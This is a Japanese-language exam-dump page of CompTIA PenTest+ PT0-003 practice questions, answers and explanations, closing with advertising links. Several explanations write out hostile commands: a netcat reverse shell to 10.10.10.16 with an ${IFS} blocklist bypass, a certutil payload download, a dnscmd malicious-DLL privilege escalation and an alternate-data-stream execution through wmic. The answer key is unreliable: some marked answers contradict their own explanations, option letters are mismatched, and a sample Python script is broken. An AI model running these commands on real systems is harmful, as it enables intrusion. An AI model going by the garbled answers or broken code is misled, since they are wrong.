合格させちゃうCompTIA PenTest+ PT0-003試験簡単かつ正確なPDF問題 [2026年02月22日]
PT0-003認証試験問題集解答を提供しています
CompTIA PT0-003 認定試験の出題範囲:
| トピック | 出題範囲 |
|---|---|
| トピック 1 |
|
| トピック 2 |
|
| トピック 3 |
|
| トピック 4 |
|
| トピック 5 |
|
質問 # 140
A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?
- A. Configure and register a service.
- B. Set up a script to be run when users log in.
- C. Install and run remote desktop software.
- D. Perform a kerberoasting attack on the host.
正解:A
解説:
Configuring and Registering a Service:
Registering a malicious service ensures that it starts automatically with the system, providing persistence even after reboots.
This method is stealthier than others and is commonly used in advanced persistent threat (APT) scenarios.
Why Not Other Options?
B (Remote desktop software): Installing such software is noisy and can easily be detected by monitoring tools.
C (User logon script): While it provides persistence, it is less reliable and more detectable than a system service.
D (Kerberoasting): This is a credential-stealing technique and does not establish persistence.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
Domain 4.0 (Penetration Testing Tools)
質問 # 141
Deconfliction is necessary when the penetration test:
- A. occurs during the monthly vulnerability scanning.
- B. uncovers indicators of prior compromise over the course of the assessment.
- C. determines that proprietary information is being stored in cleartext.
- D. proceeds in parallel with a criminal digital forensic investigation.
正解:B
解説:
This will then enable the PenTest to continue so that additional issues can be found, exploited, and analyzed.
質問 # 142
During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?
- A. Zed Attack Proxy
- B. Burp Suite
- C. Metasploit
- D. Wireshark
正解:B
解説:
Wireshark is a network packet analyzer used to capture and analyze network traffic in real-time. During a penetration test, it is often used to inspect unencrypted communication to extract sensitive information like plaintext login credentials. Here's how it works:
Packet Capturing:Wireshark captures the network packets transmitted over a network interface. If a user logs in through an insecure communication protocol (e.g., HTTP, FTP, or Telnet), the credentials are transmitted in plaintext.
Traffic Filtering:Using filters (e.g., http, tcp.port == 21), the tester narrows down the relevant traffic to locate the login request and response packets.
Sensitive Data Extraction:Analyzing the captured packets reveals plaintext credentials in the data payload, such as in HTTP POST requests.
Exploit the Information:After extracting the plaintext credentials, the tester can attempt unauthorized access to resources using these credentials.
CompTIA Pentest+ References:
Domain 1.0 (Planning and Scoping)
Domain 2.0 (Information Gathering and Vulnerability Identification)
Wireshark Usage Guide
質問 # 143
A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?
- A. Decoding
- B. Plug spinner
- C. Raking
- D. Bypassing
正解:C
解説:
Lock picking techniques are used in physical security assessments to test access control mechanisms.
* Raking (Option D):
* Raking is a lock-picking technique where a rake pick is inserted and rapidly moved in and out to manipulate multiple pins simultaneously.
* It is faster but less precise than single-pin picking.
* Used when speed is prioritized over precision.
質問 # 144
A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?
- A. netsh.exe
- B. nc.exe
- C. cmdkey.exe
- D. certutil.exe
正解:D
解説:
* Certutil.exe for File Downloads:
* certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.
* Example command:
bash
Copy code
certutil.exe
-urlcache -split -f http://example.com/file.exe file.exe
* Its native status helps it evade detection by security tools.
* Why Not Other Options?
* A (netsh.exe): Used for network configuration but not for downloading files.
* C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.
* D (cmdkey.exe): Used for managing stored credentials, not downloading files.
CompTIA Pentest+ References:
* Domain 3.0 (Attacks and Exploits)
質問 # 145
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.
正解:
解説:
See explanation below.
Explanation:
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print("%s:%s - OPEN" % (ip, port))
except socket.timeout
print("%:%s - TIMEOUT" % (ip, port))
except socket.error as e:
print("%:%s - CLOSED" % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)
質問 # 146
During an assessment, a penetration tester runs the following command:
dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll Which of the following is the penetration tester trying to achieve?
- A. A list of available users
- B. DNS enumeration
- C. Privilege escalation
- D. Command injection
正解:C
解説:
The tester is attempting to register a malicious DLL as a server-level plugin to escalate privileges.
Privilege escalation (Option B):
The command uses dnscmd.exe, a legitimate Windows tool for managing DNS servers.
By setting a malicious DLL (adduser.dll) as a server-level plugin, attackers can gain SYSTEM-level privileges.
This technique is a DLL hijacking attack.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Windows Privilege Escalation Techniques" Incorrect options:
Option A (DNS enumeration): The command modifies DNS settings rather than querying them.
Option C (Command injection): The attacker is not injecting arbitrary shell commands.
Option D (List of users): The command does not retrieve user information.et unauthorized access to
質問 # 147
A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?
- A. Using Nmap as the root user
- B. Using Nessus with credentials
- C. Using OpenVAS in default mode
- D. Using OWASP ZAP
正解:B
解説:
Using credentials during a vulnerability scan allows the scanner to gather more detailed information about the target system, including installed software, patch levels, and configuration settings. This helps to reduce the likelihood of false positives and increase the true positives of the results. Nessus is a popular vulnerability scanner that supports credential-based scanning and can be used to accomplish this goal. OpenVAS and Nmap are also popular scanning tools, but using default mode or running as the root user alone may not provide the necessary level of detail for accurate vulnerability identification. OWASP ZAP is a web application scanner and may not be applicable for non-web-based targets.
質問 # 148
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?
- A. Tailgate into the facility during a very busy time to gain initial access.
- B. Drop USB devices with malware outside of the facility in order to gain access to internal machines.
- C. Clone badge information in public areas of the facility to gain access to restricted areas.
- D. Pick the lock on the rear entrance to gain access to the facility and try to gain access.
正解:A
解説:
In an authorized physical assessment, the goal is to test physical security controls. Tailgating is a common and effective technique in such scenarios. Here's why option B is correct:
Tailgating: This involves following an authorized person into a secure area without proper credentials. During busy times, it's easier to blend in and gain access without being noticed. It tests the effectiveness of physical access controls and security personnel.
Cloning Badge Information: This can be effective but requires proximity to employees and specialized equipment, making it more complex and time-consuming.
Picking Locks: This is a more invasive technique that carries higher risk and is less stealthy compared to tailgating.
Dropping USB Devices: This tests employee awareness and response to malicious devices but does not directly test physical access controls.
Reference from Pentest:
Writeup HTB: Demonstrates the effectiveness of social engineering and tailgating techniques in bypassing physical security measures.
Forge HTB: Highlights the use of non-invasive methods like tailgating to test physical security without causing damage or raising alarms.
Conclusion:
Option B, tailgating into the facility during a busy time, is the best attack plan to gain access to the facility in an authorized physical assessment.
質問 # 149
A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client's current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?
- A. Use a generic vulnerability scanner to test the TTPs and review the results with the threat- modeling team.
- B. Perform an internal vulnerability assessment with credentials to review the internal attack surface.
- C. Perform a full internal penetration test to review all the possible exploits that could affect the systems.
- D. Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
正解:D
解説:
BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization's security defenses and response mechanisms.
Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.
Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client's security tools comprehensively. Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed.
This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.
質問 # 150
A penetration tester is enumerating a Linux system. The goal is to modify the following script to provide more comprehensive system information:
#!/bin/bash
ps aux >> linux_enum.txt
Which of the following lines would provide the most comprehensive enumeration of the system?
- A. cat /etc/passwd >> linux_enum.txt; netstat -tuln >> linux_enum.txt; cat /etc/bash.bashrc >> linux_enum.
txt - B. hostname >> linux_enum.txt; echo $USER >> linux_enum.txt; curl ifconfig.me >> linux_enum.txt
- C. lsof -i >> linux_enum.txt; uname -a >> linux_enum.txt; ls /home/ >> linux_enum.txt
- D. whoami >> linux_enum.txt; uname -a >> linux_enum.txt; ifconfig >> linux_enum.txt
正解:A
解説:
This command gathers:
/etc/passwd - lists all local user accounts.
netstat -tuln - lists listening ports and associated services.
/etc/bash.bashrc - contains environment variables and configurations that could reveal system behaviors or hidden persistence mechanisms.
This provides a much broader and deeper enumeration compared to other options.
Reference: PT0-003 Objective 4.1 - Post-exploitation techniques including enumeration of system users, services, and configurations.
質問 # 151
An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?
- A. Action Required Status Update
- B. Privileged & Confidential Status Update
- C. Urgent Status Update
- D. Important Weekly Status Update
正解:B
解説:
Penetration test results are sensitive information and must be handled confidentially.
Privileged & Confidential Status Update (Option A):
Helps ensure compliance with legal and regulatory standards by labeling the report as confidential.
Encourages secure handling by recipients.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Secure Communication and Reporting" Incorrect options:
Option B (Action Required): Suggests an immediate response is needed, which may not always be the case.
Option C (Important Weekly Status Update): Does not emphasize confidentiality.
Option D (Urgent Status Update): Could cause unnecessary alarm unless truly urgent.
質問 # 152
A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:
200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl
200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python Which of the following actions should the tester take to get the scans to work properly?
- A. Change the source IP with a VPN.
- B. Modify the scanner to only use HTTP GET requests.
- C. Modify the scanner to slow down the scan.
- D. Modify the scanner user agent.
正解:D
解説:
Explanation:
質問 # 153
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
- A. MP4 steganography
- B. Alternate data streams
- C. PsExec
- D. PowerShell modules
正解:B
解説:
Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals12. For example, the following command can create an ADS named secret.exe in a file named test.txt and run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"
質問 # 154
During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network.
Which of the following attacks would the tester most likely perform to gain access?
- A. MAC address spoofing
- B. Beacon flooding
- C. KARMA attack
- D. Eavesdropping
正解:C
解説:
To exploit a vulnerability in a wireless network's authentication mechanism and gain unauthorized access, the penetration tester would most likely perform a KARMA attack.
KARMA Attack:
Definition: KARMA (KARMA Attacks Radio Machines Automatically) is an attack technique that exploits the tendency of wireless clients to automatically connect to previously connected wireless networks.
Mechanism: Attackers set up a rogue access point that impersonates a legitimate wireless network. When clients automatically connect to this rogue AP, attackers can capture credentials or provide malicious services.
Purpose:
Unauthorized Access: By setting up a rogue access point, attackers can trick legitimate clients into connecting to their network, thereby gaining unauthorized access.
Other Options:
Beacon Flooding: Involves sending a large number of fake beacon frames to create noise and disrupt network operations. Not directly useful for gaining unauthorized access.
MAC Address Spoofing: Involves changing the MAC address of an attacking device to match a trusted device. Useful for bypassing MAC-based access controls but not specific to wireless network authentication.
Eavesdropping: Involves intercepting and listening to network traffic, useful for gathering information but not directly for gaining unauthorized access.
Pentest Reference:
Wireless Security Assessments: Understanding common attack techniques such as KARMA is crucial for identifying and exploiting vulnerabilities in wireless networks.
Rogue Access Points: Setting up rogue APs to capture credentials or perform man-in-the-middle attacks is a common tactic in wireless penetration testing.
By performing a KARMA attack, the penetration tester can exploit the wireless network's authentication mechanism and gain unauthorized access to the network.
質問 # 155
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
- A. ${IFS}
- B. + *
- C. %0a
- D. %20
正解:A
解説:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
* Command Injection:
* Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
* Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
* Bypassing Filters:
* ${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
* Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin
/sh${IFS}10.10.10.16${IFS}4444.
* Alternative Encodings:
* %0a: Represents a newline character in URL encoding.
* +: Sometimes used in place of space in URLs.
* %20: URL encoding for space.
* However, ${IFS} is most appropriate for shell command contexts.
Pentest References:
* Command Injection: Understanding how command injection works and common techniques to exploit it.
* Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
* Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability's exploitability.
質問 # 156
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Open-source research
- B. Traffic sniffing
- C. A ping sweep
- D. An Nmap scan
- E. A vulnerability scan
- F. Port knocking
正解:A、B
解説:
Open-source research and traffic sniffing are two activities that have a minimal chance of detection, as they do not involve sending any packets or requests to the target network or system. Open-source research is the process of gathering information from publicly available sources, such as websites, social media, blogs, forums, etc. Traffic sniffing is the process of capturing and analyzing network packets that are transmitted over a shared medium, such as wireless or Ethernet.
Reference: https://www.sciencedirect.com/topics/computer-science/passive-reconnaissance
質問 # 157
A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?
- A. Ettercap
- B. Nmap
- C. Wireshark
- D. Netcat
正解:A
解説:
ARP poisoning is a technique that exploits the weakness of the ARP protocol to redirect network traffic to a malicious host. Ettercap is a tool that can perform ARP poisoning and other network attacks, such as DNS spoofing, SSL stripping, and password sniffing. Wireshark, Netcat, and Nmap are not designed for ARP poisoning, although they can be used for other purposes, such as packet analysis, network communication, and port scanning. References: The Official CompTIA PenTest+ Student Guide (Exam PT0-002) eBook, Chapter 5, Section 5.2.1: ARP Poisoning; Best PenTest+ certification study resources and training materials, Section 2: ARP Poisoning.
質問 # 158
A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:
Server High-severity vulnerabilities
1. Development sandbox server 32
2. Back office file transfer server 51
3. Perimeter network web server 14
4. Developer QA server 92
The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?
- A. Server 4
- B. Server 2
- C. Server 1
- D. Server 3
正解:D
解説:
Client Concern:
Availability: The client is specifically concerned about the availability of their consumer-facing production application. Ensuring this application is secure and available is crucial to the business.
Server Analysis:
Server 1 (Development sandbox server): Typically not a production server; vulnerabilities here are less likely to impact the consumer-facing application.
Server 2 (Back office file transfer server): Important but generally more internal-facing and less likely to directly affect the consumer-facing application.
Server 3 (Perimeter network web server): Likely hosts the consumer-facing application or critical services related to it. High-severity vulnerabilities here could directly impact availability.
Server 4 (Developer QA server): Similar to Server 1, more likely to be used for testing rather than production, making it less critical for immediate manual testing.
質問 # 159
A penetration tester wants to use PowerView in an AD environment. Which of the following is the most likely reason?
- A. To enumerate user groups
- B. To collect local hashes
- C. To decrypt stored passwords
- D. To escalate privileges
正解:A
解説:
PowerView is a PowerShell tool used for Active Directory enumeration. It is part of the PowerSploit framework and allows penetration testers to gather detailed information about the AD environment, including user accounts, groups, computers, shares, and trust relationships.
PowerView is most commonly used to:
* Enumerate domain users, groups, and memberships
* Identify privileged users and group memberships
* Discover domain trusts and permissions
According to the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 8 - Post-Exploitation and Lateral Movement):
"PowerView is a post-exploitation tool used primarily for Active Directory reconnaissance, including user and group enumeration, identifying domain trusts, and mapping out the AD structure."
質問 # 160
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
- A. Preserving artifacts
- B. Keeping chain of custody
- C. Reverting configuration changes
- D. Exporting credential data
正解:A
解説:
Preserving artifacts ensures that key outputs from the penetration test, such as logs, screenshots, captured data, and any generated reports, are retained for analysis, reporting, and future reference.
質問 # 161
Which of the following tools is specifically designed to scan containers and Kubernetes environments for vulnerabilities?
- A. Nikto
- B. Trivy
- C. Nessus
- D. Nmap
正解:B
解説:
Containers (e.g., Docker, Kubernetes) require specialized scanning tools to detect vulnerabilities.
* Trivy (Option B):
* Trivy is an open-source vulnerability scanner designed specifically for containers and Kubernetes environments.
* It scans container images, repositories, and running containers for known vulnerabilities (CVEs).
質問 # 162
A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?
- A. nslookup mydomain.com /path/to/results.txt
- B. cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com
- C. crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com
- D. dig @8.8.8.8 mydomain.com ANY /path/to/results.txt
正解:B
解説:
Using dig with a wordlist to identify subdomains is an effective method for subdomain enumeration. The command cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com reads each line from wordlist.txt and performs a DNS lookup for each potential subdomain.
Step-by-Step Explanation
Command Breakdown:
cat wordlist.txt: Reads the contents of wordlist.txt, which contains a list of potential subdomains.
xargs -n 1 -I 'X': Takes each line from wordlist.txt and passes it to dig one at a time.
dig X.mydomain.com: Performs a DNS lookup for each subdomain.
Why This is the Best Choice:
Efficiency: xargs efficiently processes each line from the wordlist and passes it to dig for DNS resolution.
Automation: Automates the enumeration of subdomains, making it a practical choice for large lists.
Benefits:
Automates the process of subdomain enumeration using a wordlist.
Efficiently handles a large number of subdomains.
Reference from Pentesting Literature:
Subdomain enumeration is a critical part of the reconnaissance phase in penetration testing. Tools like dig and techniques involving wordlists are commonly discussed in penetration testing guides.
HTB write-ups often detail the use of similar commands for efficient subdomain enumeration.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups
質問 # 163
......
検証済みで更新されたPT0-003問題集と解答で100%一発合格保証の問題集:https://drive.google.com/open?id=1bIAfjlhhpZ0Q4IhgC6TiSSZ_gR-FtOHD
更新されたPT0-003試験練習テスト問題:https://www.jpntest.com/shiken/PT0-003-mondaishu